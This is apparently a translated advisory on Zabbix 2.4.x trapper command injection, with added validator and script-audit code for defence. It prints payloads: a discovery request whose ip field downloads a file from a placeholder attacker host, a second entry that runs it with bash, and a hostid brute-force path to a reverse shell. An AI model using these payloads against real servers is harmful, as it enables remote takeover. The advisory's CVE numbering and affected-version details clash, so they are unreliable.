Zabbix hit by remote code execution and database write high-risk vulnerabilities - vulnerability warning - Black Bar Safety Net

Source: www.myhack58.com (MYHACK58:62201785725), author: 佚名 (anonymous), published 2017-05-01 00:00:00

EPSS: 0.716 (High), percentile 98.1%

About Zabbix
Zabbix is an enterprise-class open source solution that provides distributed system monitoring and network monitoring through a web-based interface.
Zabbix monitors a wide range of network parameters to keep server systems running securely, and provides a flexible notification mechanism that lets system administrators quickly locate and resolve problems.
Vulnerability description
Zabbix Server Active Proxy Trapper remote code execution vulnerability (CVE-2017-2824) ★★★★
Zabbix 2.4.x contains a code execution vulnerability in the trapper's command function: a specially crafted packet causes command injection and therefore remote code execution. An attacker can trigger the vulnerability by sending requests to the Zabbix Server in the role of a Zabbix proxy.
Vulnerability details
The vulnerability lies in the "Trapper" part of the Zabbix code, the network service (TCP port 10051) whose main job is to let the Proxy and the Server communicate. The Zabbix Server exposes a set of API calls to the Zabbix Proxy; the two that matter here are "discovery data" and "command". Example requests look like this:
{"request":"command","scriptid":1,"hostid":10001}
{"request":"discovery data","host":"zabbix-proxy.com","clock":10,
"data":[{"clock":10,"drule":1,"dcheck":2,"type":0,"ip":"10.0.0.1","dns":"zabbix-agent.com","port":10050,"key":"test","status":0,"value":"test_value"}]}
Note that the command request invokes a script stored in the Zabbix database without performing any authentication. The other key aspect of the vulnerability is that, by default, Zabbix 2.4.x populates the scripts table of its MySQL database with the following three scripts:

scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1

scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1

scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1

The problem is that when a script is invoked, the {HOST.CONN} field is replaced with the host's IP address. The value substituted for {HOST.CONN} comes from the Zabbix interface table, where it is stored in the "ip" field, a VARCHAR(64). So if an attacker can create an interface whose IP address contains a command injection, and then run a script containing {HOST.CONN} against it through a "command" request, the injected command executes and a reverse shell can be obtained.
The difficulty is getting such a value inserted into the Zabbix host table. By default an unauthenticated attacker cannot do this; it requires additional configuration by the system administrator, specifically Zabbix's auto-discovery function.
Zabbix's auto-discovery and auto-registration functions allow the Zabbix Server's configuration to be changed based on data that a Zabbix Proxy sends to it. More specifically, if a host reported by the Zabbix Proxy has certain characteristics according to the server's configuration, certain actions can be taken, one of which adds the newly discovered host to several Zabbix database tables. In that case the host is inserted into the "host" table and an entry is created in the Zabbix interface table, with the IP address supplied by the proxy placed in the ip column without any validation of that IP address.
Therefore, by sending a suitable discovery data request to the server, a command can be injected into the database:
write_script_cmd = '{
"request":"discovery data",
"host":"zabbix-proxy.domain.fake",
"clock":148535399,
"data":[{
"clock":1485353070,
"drule":88,
"dcheck":174,
"type":0,
"ip":";wget -O /tmp/s http://attacker-ip/s;#",
"dns":"host28.domain.fake",
"port":10050,
"key":"sectest",
"status":0,
"value":"lnxhost"
}]}'
Because of the size limit of the ip field in the Zabbix interface table, the payload is split and a second host is inserted with a different IP address value:
// Host 2
ip: /bin/bash /tmp/s;#
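The root cause described above is that the server copies the proxy-supplied ip/dns values into the interface table without checking that they are an address and a hostname at all. The following added example (written for this page, not code from Zabbix or from the advisory's author) shows the check a trapper handler should apply before trusting a "discovery data" request: every entry's ip must parse as a literal IPv4/IPv6 address and fit the 64-character column, dns must match RFC 1123 hostname syntax, and port must be in range. The two sample requests are constructed for the example; the malicious one reuses the ip values quoted in the advisory so that the validator is seen rejecting exactly that shape of input.

```python
"""
Added example, not part of the advisory or of Zabbix: a strict validator for the
trapper "discovery data" request, modelling the input check that Zabbix 2.4.x
lacked before inserting proxy-reported ip/dns values into the interface table.
Both sample payloads below are constructed for this example.
"""
import ipaddress
import json
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 253 characters overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
INTERFACE_IP_MAX = 64  # width of the VARCHAR(64) interface.ip column named in the advisory


def valid_ip(value):
    """True only if value is a literal IPv4/IPv6 address that fits the ip column."""
    if not isinstance(value, str) or len(value) > INTERFACE_IP_MAX:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def valid_hostname(value):
    return isinstance(value, str) and bool(HOSTNAME_RE.match(value))


def validate_discovery_data(raw):
    """Parse a trapper request and return a list of (index, field, reason) rejections.

    An empty list means every discovery entry carried a well-formed ip/dns/port
    and could be copied into the interface table without carrying shell syntax.
    """
    try:
        msg = json.loads(raw)
    except ValueError as exc:
        return [(-1, "json", f"not valid JSON: {exc}")]
    if msg.get("request") != "discovery data":
        return [(-1, "request", "not a discovery data request")]
    if not valid_hostname(msg.get("host", "")):
        return [(-1, "host", "proxy host name is not a valid hostname")]
    problems = []
    for i, entry in enumerate(msg.get("data", [])):
        if not valid_ip(entry.get("ip")):
            problems.append((i, "ip", f"not a literal IP address: {entry.get('ip')!r}"))
        dns = entry.get("dns", "")
        if dns != "" and not valid_hostname(dns):  # an empty dns is allowed by Zabbix
            problems.append((i, "dns", f"not a valid hostname: {dns!r}"))
        port = entry.get("port")
        if not isinstance(port, int) or not 0 <= port <= 65535:
            problems.append((i, "port", f"port out of range: {port!r}"))
    return problems


# Constructed benign request, after the shape shown in the advisory.
BENIGN = json.dumps({
    "request": "discovery data", "host": "zabbix-proxy.com", "clock": 10,
    "data": [{"clock": 10, "drule": 1, "dcheck": 2, "type": 0, "ip": "10.0.0.1",
              "dns": "zabbix-agent.com", "port": 10050, "key": "test",
              "status": 0, "value": "test_value"}],
})

# Constructed malicious request: the "ip" fields carry shell syntax instead of an
# address, the two-host split the advisory describes. "attacker-ip" is a placeholder.
MALICIOUS = json.dumps({
    "request": "discovery data", "host": "zabbix-proxy.domain.fake", "clock": 148535399,
    "data": [{"clock": 1485353070, "drule": 88, "dcheck": 174, "type": 0,
              "ip": ";wget -O /tmp/s http://attacker-ip/s;#", "dns": "host28.domain.fake",
              "port": 10050, "key": "sectest", "status": 0, "value": "lnxhost"},
             {"clock": 1485353070, "drule": 88, "dcheck": 174, "type": 0,
              "ip": "/bin/bash /tmp/s;#", "dns": "host29.domain.fake",
              "port": 10050, "key": "sectest", "status": 0, "value": "lnxhost"}],
})

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, validate_discovery_data(raw) or "OK")
```

The same function is usable on the detection side: fed with trapper payloads captured on port 10051, any "discovery data" request that produces a non-empty rejection list is a direct indicator of this attack, since a legitimate proxy never reports an ip that is not an address.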
After these two hosts have been added, one problem remains: the hostid required by the command request is unknown, but this is easily solved. Hostids can be brute-forced against the database, because different command requests return different responses, which reveals whether a host exists; once a host's existence has been confirmed, the scripts can be called on it directly and a reverse shell obtained. The command request looks like this:
run_cmd = '{
"request":"command",
"scriptid":1,
"hostid":14666
}'

Mitigation measures
Remove the default script entries from the Zabbix database. This can be done directly in the database with the SQL: USE zabbix; DELETE FROM scripts; or through the graphical interface (Administration -> Scripts -> tick the scripts -> Delete Selected).
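Deleting every global script is the blunt form of the mitigation. An administrator who wants to keep custom scripts needs to know which rows actually interpolate a host-supplied macro into a shell command line. The following added example (written for this page, not Zabbix's or the advisory's code) audits a scripts table for that pattern and applies either the advisory's full cleanup or a narrower one. The table is rebuilt in an in-memory SQLite database with constructed rows; the column names scriptid, name and command match the Zabbix schema, and the three default commands are the ones listed above. Against a real server the same SELECT and DELETE statements run over the MySQL zabbix.scripts table.

```python
"""
Added example, not part of the advisory or of Zabbix: audit the scripts table
for commands that embed a macro whose value comes from the interface table
({HOST.CONN}, {HOST.IP}, {HOST.DNS}), i.e. from proxy-reported discovery data,
then remove them. The database and its rows are constructed for this example.
"""
import re
import sqlite3

# Macros resolved from the interface table, the column the advisory shows being
# filled from unvalidated discovery data.
HOST_MACRO_RE = re.compile(r"\{HOST\.(CONN|IP|DNS)\}")


def open_sample_db():
    """Constructed stand-in for zabbix.scripts: the three 2.4.x defaults plus one harmless script."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE scripts (scriptid INTEGER PRIMARY KEY, name TEXT, command TEXT)")
    con.executemany("INSERT INTO scripts VALUES (?, ?, ?)", [
        (1, "Ping", "/bin/ping -c {HOST.CONN} 2>&1"),
        (2, "Traceroute", "/usr/bin/traceroute {HOST.CONN} 2>&1"),
        (3, "Detect operating system", "sudo /usr/bin/nmap -O {HOST.CONN} 2>&1"),
        (4, "Uptime", "/usr/bin/uptime"),  # constructed: takes no host-controlled input
    ])
    con.commit()
    return con


def risky_scripts(con):
    """Return [(scriptid, command)] for every script that embeds a host-supplied macro."""
    rows = con.execute("SELECT scriptid, command FROM scripts ORDER BY scriptid").fetchall()
    return [(sid, cmd) for sid, cmd in rows if HOST_MACRO_RE.search(cmd)]


def remaining_script_count(con):
    return con.execute("SELECT COUNT(*) FROM scripts").fetchone()[0]


def remove_default_scripts(con):
    """The advisory's mitigation (DELETE FROM scripts). Returns the number of rows removed."""
    before = remaining_script_count(con)
    con.execute("DELETE FROM scripts")
    con.commit()
    return before


def remove_risky_scripts(con):
    """Narrower variant: delete only the scripts the audit flagged. Returns their ids."""
    ids = [sid for sid, _ in risky_scripts(con)]
    con.executemany("DELETE FROM scripts WHERE scriptid = ?", [(i,) for i in ids])
    con.commit()
    return ids


if __name__ == "__main__":
    db = open_sample_db()
    for sid, cmd in risky_scripts(db):
        print(f"scriptid {sid}: {cmd}")
    print("removed", remove_risky_scripts(db), "remaining", remaining_script_count(db))
```

Scripts that keep a host macro after the fix is applied should still be treated as shell commands built from database content: the 2.4.8r1 fix closes the unvalidated write path, but an audit like this is what shows whether any remaining script would again become a command-injection sink if another write path appeared.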

Zabbix Proxy database write vulnerability (CVE-2017-2824)
Zabbix 2.4.x has a database write vulnerability in the trapper function: a specially crafted trapper packet passes the database logic checks and causes a database write. An attacker in a man-in-the-middle position between the Zabbix proxy and the Server can modify requests to trigger the vulnerability.
Affected versions
Zabbix 2.4.7 - 2.4.8r1
Reference
http://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html
http://www.talosintelligence.com/reports/TALOS-2017-0325/
http://www.talosintelligence.com/reports/TALOS-2017-0326/
https://support.zabbix.com/browse/ZBX-12075
https://support.zabbix.com/browse/ZBX-12076